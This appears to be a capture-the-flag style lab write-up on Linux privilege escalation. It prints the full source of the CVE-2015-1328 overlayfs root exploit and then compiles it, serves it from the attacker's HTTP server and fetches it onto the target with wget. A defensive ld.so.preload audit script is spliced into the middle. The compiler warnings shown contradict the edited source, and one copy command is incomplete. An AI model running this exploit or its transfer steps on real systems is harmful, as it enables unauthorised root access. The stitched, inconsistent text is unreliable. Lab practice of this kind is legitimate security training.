Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)  | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC)                                                                                    | linux/dos/44301.c
Logpoint < 5.6.4 - Root Remote Code Execution                                                                              | linux/remote/42158.py
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates                                                     | linux/dos/46435.txt
MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates                                                     | linux/dos/46435.txt
Nagios < 4.2.2 - Arbitrary Code Execution                                                                                  | linux/remote/40920.py
Nagios < 4.2.4 - Local Privilege Escalation                                                                                | linux/local/40921.sh
NfSen < 1.3.7 / AlienVault OSSIM < 5.3.6 - Local Privilege Escalation                                                      | linux/local/42305.txt
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                   | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                             | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                               | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                                     | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                       | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                   | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                       | linux/remote/45939.py
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service                                                                 | linux/dos/34522.txt
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service                                                     | linux/dos/34521.txt
Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Local Privilege Escalation                                                      | linux/local/41196.txt
Oracle WebCenter FatWire Content Server < 7 - Improper Access Control                                                      | linux/webapps/44757.txt
pam-krb5 < 3.13 - Local Privilege Escalation                                                                               | linux/local/8303.c
PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution                                                                           | linux/local/3426.php
PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure                                                                 | linux/local/3427.php
PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow                                                                      | linux/local/3571.php
PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite                                                                   | linux/local/3572.php
Pi-hole < 4.4 - Authenticated Remote Code Execution                                                                        | linux/webapps/48442.py
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation                                                | linux/webapps/48443.py
Redis-cli < 5.0 - Buffer Overflow (PoC)                                                                                    | linux/local/44904.py
RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution                                                          | linux/webapps/45361.py
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)                                                                 | linux/local/46359.md
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)                                                                 | linux/local/46369.md
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)                               | linux/remote/42084.rb
SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion                                                                         | linux/webapps/44655.txt
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)                                                                | linux/local/47009.c
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)                                                  | linux/webapps/41697.rb
Splunk < 7.0.1 - Information Disclosure                                                                                    | linux/webapps/44865.txt
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation                                   | linux/local/43935.txt
Tenable Appliance < 4.5 - Root Remote Code Execution                                                                       | linux/remote/41892.sh
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                                     | linux/local/41760.txt
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution                                              | linux/remote/42949.txt
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation                                                             | linux/local/42936.md
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape                                                                | linux/local/42937.md
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution                                                                 | linux/local/46973.md
Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities                                                                 | linux/remote/9143.txt
WordPress Core < 4.7.4 - Unauthorized Password Reset                                                                       | linux/webapps/41963.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Use Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation:

┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/exploitdb/exploits/linux/local/37292.c .

Take a look at its contents:

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE          /* added: <sched.h> only declares unshare()/clone() with this */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/wait.h>        /* added: declares wait()/waitpid() */
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

/* source of the helper library that the exploit normally compiles on the target */
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
    return 0;   /* added: the function is declared int but had no return value */
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    fprintf(stderr,"spawning threads\n");
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
        if((init = fork()) == 0) {
            pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
            waitpid(pid, &status, 0);
        }
        waitpid(init, &status, 0);
        return 0;
    }
    usleep(300000);
    wait(NULL);
    fprintf(stderr,"child threads done\n");
    fd = open("/etc/ld.so.preload",O_WRONLY);
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    // I commented out the section below
    /*
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    */
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

Because the target environment has no gcc compiler, every step that involves compiling has to be worked around. Here the shared library the exploit needs is copied straight into the target's /tmp directory, and the exp itself is compiled locally and then uploaded.

First locate the required .so file:

┌──(kali㉿kali)-[~/HTB/week1]
└─$ locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so

Compile the exp:

┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc -o exp 37292.c
37292.c: In function ‘main’:
37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration]
  106 |         if(unshare(CLONE_NEWUSER) != 0)
      |            ^~~~~~~
37292.c:111:17: warning: implicit declaration of function ‘clone’; did you mean ‘close’? [-Wimplicit-function-declaration]
  111 |                 clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
      |                 ^~~~~
      |                 close
37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]
  117 |             waitpid(pid, &status, 0);
      |             ^~~~~~~
37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
  127 |     wait(NULL);
      |     ^~~~

┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py  37292.c  exp

The compiler printed warnings, but exp was still generated successfully. Now copy the required .so file as well:

┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so

┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py  37292.c  exp  ofs-lib.so

Then start an HTTP server:

┌──(kali㉿kali)-[~/HTB/week1]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

Because this exp works with files under /tmp, download the files into /tmp on the target:

/tmp # wget 192.168.64.128:8888/exp
wget 192.168.64.128:8888/exp
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
exp                  100% |*******************************| 17576   0:00:00 ETA
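What this exploit leaves behind is an /etc/ld.so.preload entry pointing at a library under /tmp (here /tmp/ofs-lib.so), which is the artifact a defender would look for on a host. As an added example that is not part of this write-up, the POSIX sh function below audits a preload file and flags entries under user-writable directories, relative paths, and dangling entries; the file path argument and the sample files are assumptions so that it runs offline.

```shell
#!/bin/sh
# audit_ld_preload [FILE]
# Audits an ld.so.preload-style file (default: /etc/ld.so.preload).
# Every non-empty, non-comment line names a library the dynamic loader
# injects into every process, so an entry under /tmp, as the ofs-lib.so
# used with CVE-2015-1328 is, is a strong compromise indicator.
# Prints one FLAG line per suspicious entry; returns 0 if clean, 1 otherwise.
audit_ld_preload() {
    preload="${1:-/etc/ld.so.preload}"
    flagged=0
    # An absent file means nothing is preloaded: that is the normal state.
    [ -f "$preload" ] || return 0
    # "|| [ -n ... ]" keeps a final line that lacks a trailing newline.
    while IFS= read -r line || [ -n "$line" ]; do
        entry="${line%%#*}"                       # drop comments
        entry="$(printf '%s' "$entry" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')"
        [ -n "$entry" ] || continue               # skip blank lines
        case "$entry" in
            /tmp/*|/var/tmp/*|/dev/shm/*|/home/*)
                echo "FLAG: $entry is under a user-writable directory"
                flagged=1; continue ;;
            /*) ;;
            *)
                echo "FLAG: $entry is not an absolute path"
                flagged=1; continue ;;
        esac
        if [ ! -e "$entry" ]; then
            echo "FLAG: $entry does not exist (dangling preload entry)"
            flagged=1
        fi
    done < "$preload"
    return "$flagged"
}
```

Run it without arguments on a host to check the real /etc/ld.so.preload; the exit status makes it usable from a cron job or a configuration-management check.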

Another note: the binary built with kali's gcc did not seem able to escalate privileges, but one built on ubuntu worked; I am not sure whether this is due to the operating system or the gcc version:

yu@yu-virtual-machine:/var/www/html$ gcc --version
gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc --version
gcc (Debian 12.2.0-14) 12.2.0
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Finally, privilege escalation succeeds.

[Image (failed to load): https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601204229-ontbx8a.png]
